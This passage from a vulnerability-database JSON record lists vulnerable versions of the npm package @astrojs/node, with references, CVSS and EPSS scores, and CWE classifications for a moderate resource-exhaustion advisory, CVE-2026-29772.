                {
                    "vulnerability": "VCID-mhk4-vf4t-47g7"
                },
                {
                    "vulnerability": "VCID-mu7k-psez-uudf"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@9.3.1"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/843160?format=api",
            "purl": "pkg:npm/%40astrojs/node@9.3.2",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-b47j-p5et-rfem"
                },
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mhk4-vf4t-47g7"
                },
                {
                    "vulnerability": "VCID-mu7k-psez-uudf"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@9.3.2"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/843161?format=api",
            "purl": "pkg:npm/%40astrojs/node@9.3.3",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-b47j-p5et-rfem"
                },
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mhk4-vf4t-47g7"
                },
                {
                    "vulnerability": "VCID-mu7k-psez-uudf"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@9.3.3"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/843162?format=api",
            "purl": "pkg:npm/%40astrojs/node@9.4.0",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-b47j-p5et-rfem"
                },
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mhk4-vf4t-47g7"
                },
                {
                    "vulnerability": "VCID-mu7k-psez-uudf"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@9.4.0"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/86109?format=api",
            "purl": "pkg:npm/%40astrojs/node@9.4.1",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-b47j-p5et-rfem"
                },
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mu7k-psez-uudf"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@9.4.1"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/968752?format=api",
            "purl": "pkg:npm/%40astrojs/node@9.4.2",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-b47j-p5et-rfem"
                },
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mu7k-psez-uudf"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@9.4.2"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/968753?format=api",
            "purl": "pkg:npm/%40astrojs/node@9.4.3",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-b47j-p5et-rfem"
                },
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mu7k-psez-uudf"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@9.4.3"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/968754?format=api",
            "purl": "pkg:npm/%40astrojs/node@9.4.4",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-b47j-p5et-rfem"
                },
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mu7k-psez-uudf"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@9.4.4"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/968755?format=api",
            "purl": "pkg:npm/%40astrojs/node@9.4.5",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-b47j-p5et-rfem"
                },
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mu7k-psez-uudf"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@9.4.5"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/968756?format=api",
            "purl": "pkg:npm/%40astrojs/node@9.4.6",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-b47j-p5et-rfem"
                },
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mu7k-psez-uudf"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@9.4.6"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/968757?format=api",
            "purl": "pkg:npm/%40astrojs/node@9.5.0",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-b47j-p5et-rfem"
                },
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mu7k-psez-uudf"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@9.5.0"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/968758?format=api",
            "purl": "pkg:npm/%40astrojs/node@9.5.1",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-b47j-p5et-rfem"
                },
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mu7k-psez-uudf"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@9.5.1"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/968759?format=api",
            "purl": "pkg:npm/%40astrojs/node@9.5.2",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-b47j-p5et-rfem"
                },
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mu7k-psez-uudf"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@9.5.2"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/968760?format=api",
            "purl": "pkg:npm/%40astrojs/node@9.5.3",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-b47j-p5et-rfem"
                },
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mu7k-psez-uudf"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@9.5.3"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/74205?format=api",
            "purl": "pkg:npm/%40astrojs/node@9.5.4",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@9.5.4"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/992798?format=api",
            "purl": "pkg:npm/%40astrojs/node@9.5.5",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@9.5.5"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/992799?format=api",
            "purl": "pkg:npm/%40astrojs/node@10.0.0-alpha.0",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@10.0.0-alpha.0"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/992800?format=api",
            "purl": "pkg:npm/%40astrojs/node@10.0.0-alpha.2",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@10.0.0-alpha.2"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/992801?format=api",
            "purl": "pkg:npm/%40astrojs/node@10.0.0-alpha.3",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@10.0.0-alpha.3"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/992802?format=api",
            "purl": "pkg:npm/%40astrojs/node@10.0.0-beta.0",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@10.0.0-beta.0"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/992803?format=api",
            "purl": "pkg:npm/%40astrojs/node@10.0.0-beta.1",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@10.0.0-beta.1"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/992804?format=api",
            "purl": "pkg:npm/%40astrojs/node@10.0.0-beta.2",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@10.0.0-beta.2"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/992805?format=api",
            "purl": "pkg:npm/%40astrojs/node@10.0.0-beta.3",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@10.0.0-beta.3"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/992806?format=api",
            "purl": "pkg:npm/%40astrojs/node@10.0.0-beta.4",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@10.0.0-beta.4"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/992807?format=api",
            "purl": "pkg:npm/%40astrojs/node@10.0.0-beta.5",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@10.0.0-beta.5"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/992808?format=api",
            "purl": "pkg:npm/%40astrojs/node@10.0.0-beta.6",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@10.0.0-beta.6"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/992809?format=api",
            "purl": "pkg:npm/%40astrojs/node@10.0.0-beta.7",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@10.0.0-beta.7"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/992810?format=api",
            "purl": "pkg:npm/%40astrojs/node@10.0.0-beta.8",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@10.0.0-beta.8"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/992811?format=api",
            "purl": "pkg:npm/%40astrojs/node@10.0.0-beta.9",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@10.0.0-beta.9"
        }
    ],
    "references": [
        {
            "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-29772",
            "reference_id": "",
            "reference_type": "",
            "scores": [
                {
                    "value": "0.00026",
                    "scoring_system": "epss",
                    "scoring_elements": "0.07838",
                    "published_at": "2026-06-05T12:55:00Z"
                },
                {
                    "value": "0.00026",
                    "scoring_system": "epss",
                    "scoring_elements": "0.0778",
                    "published_at": "2026-06-08T12:55:00Z"
                },
                {
                    "value": "0.00026",
                    "scoring_system": "epss",
                    "scoring_elements": "0.07823",
                    "published_at": "2026-06-07T12:55:00Z"
                },
                {
                    "value": "0.00026",
                    "scoring_system": "epss",
                    "scoring_elements": "0.0785",
                    "published_at": "2026-06-06T12:55:00Z"
                }
            ],
            "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-29772"
        },
        {
            "reference_url": "https://github.com/withastro/astro",
            "reference_id": "",
            "reference_type": "",
            "scores": [
                {
                    "value": "5.9",
                    "scoring_system": "cvssv3.1",
                    "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"
                },
                {
                    "value": "MODERATE",
                    "scoring_system": "generic_textual",
                    "scoring_elements": ""
                }
            ],
            "url": "https://github.com/withastro/astro"
        },
        {
            "reference_url": "https://github.com/withastro/astro/commit/f9ee8685dd26e9afeba3b48d41ad6714f624b12f",
            "reference_id": "",
            "reference_type": "",
            "scores": [
                {
                    "value": "5.9",
                    "scoring_system": "cvssv3.1",
                    "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"
                },
                {
                    "value": "MODERATE",
                    "scoring_system": "generic_textual",
                    "scoring_elements": ""
                }
            ],
            "url": "https://github.com/withastro/astro/commit/f9ee8685dd26e9afeba3b48d41ad6714f624b12f"
        },
        {
            "reference_url": "https://github.com/withastro/astro/releases/tag/@astrojs/node@10.0.0",
            "reference_id": "",
            "reference_type": "",
            "scores": [
                {
                    "value": "5.9",
                    "scoring_system": "cvssv3.1",
                    "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"
                },
                {
                    "value": "MODERATE",
                    "scoring_system": "generic_textual",
                    "scoring_elements": ""
                }
            ],
            "url": "https://github.com/withastro/astro/releases/tag/@astrojs/node@10.0.0"
        },
        {
            "reference_url": "https://github.com/withastro/astro/security/advisories/GHSA-3rmj-9m5h-8fpv",
            "reference_id": "",
            "reference_type": "",
            "scores": [
                {
                    "value": "5.9",
                    "scoring_system": "cvssv3.1",
                    "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"
                },
                {
                    "value": "MODERATE",
                    "scoring_system": "cvssv3.1_qr",
                    "scoring_elements": ""
                },
                {
                    "value": "MODERATE",
                    "scoring_system": "generic_textual",
                    "scoring_elements": ""
                },
                {
                    "value": "Track",
                    "scoring_system": "ssvc",
                    "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-24T20:16:28Z/"
                }
            ],
            "url": "https://github.com/withastro/astro/security/advisories/GHSA-3rmj-9m5h-8fpv"
        },
        {
            "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-29772",
            "reference_id": "",
            "reference_type": "",
            "scores": [
                {
                    "value": "5.9",
                    "scoring_system": "cvssv3.1",
                    "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"
                },
                {
                    "value": "MODERATE",
                    "scoring_system": "generic_textual",
                    "scoring_elements": ""
                }
            ],
            "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-29772"
        },
        {
            "reference_url": "https://github.com/advisories/GHSA-3rmj-9m5h-8fpv",
            "reference_id": "GHSA-3rmj-9m5h-8fpv",
            "reference_type": "",
            "scores": [
                {
                    "value": "MODERATE",
                    "scoring_system": "cvssv3.1_qr",
                    "scoring_elements": ""
                }
            ],
            "url": "https://github.com/advisories/GHSA-3rmj-9m5h-8fpv"
        }
    ],
    "weaknesses": [
        {
            "cwe_id": 770,
            "name": "Allocation of Resources Without Limits or Throttling",
            "description": "The product allocates a reusable resource or group of resources on behalf of an actor without imposing any restrictions on the size or number of resources that can be allocated, in violation of the intended security policy for that actor."
        },
        {
            "cwe_id": 937,
            "name": "OWASP Top Ten 2013 Category A9 - Using Components with Known Vulnerabilities",
            "description": "Weaknesses in this category are related to the A9 category in the OWASP Top Ten 2013."
        },
        {
            "cwe_id": 1035,
            "name": "OWASP Top Ten 2017 Category A9 - Using Components with Known Vulnerabilities",
            "description": "Weaknesses in this category are related to the A9 category in the OWASP Top Ten 2017."
        }
    ],
    "exploits": [],
    "severity_range_score": "4.0 - 6.9",
    "exploitability": "0.5",
    "weighted_severity": "6.2",
    "risk_score": 3.1,
    "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-c6g3-td4y-gbgj"
}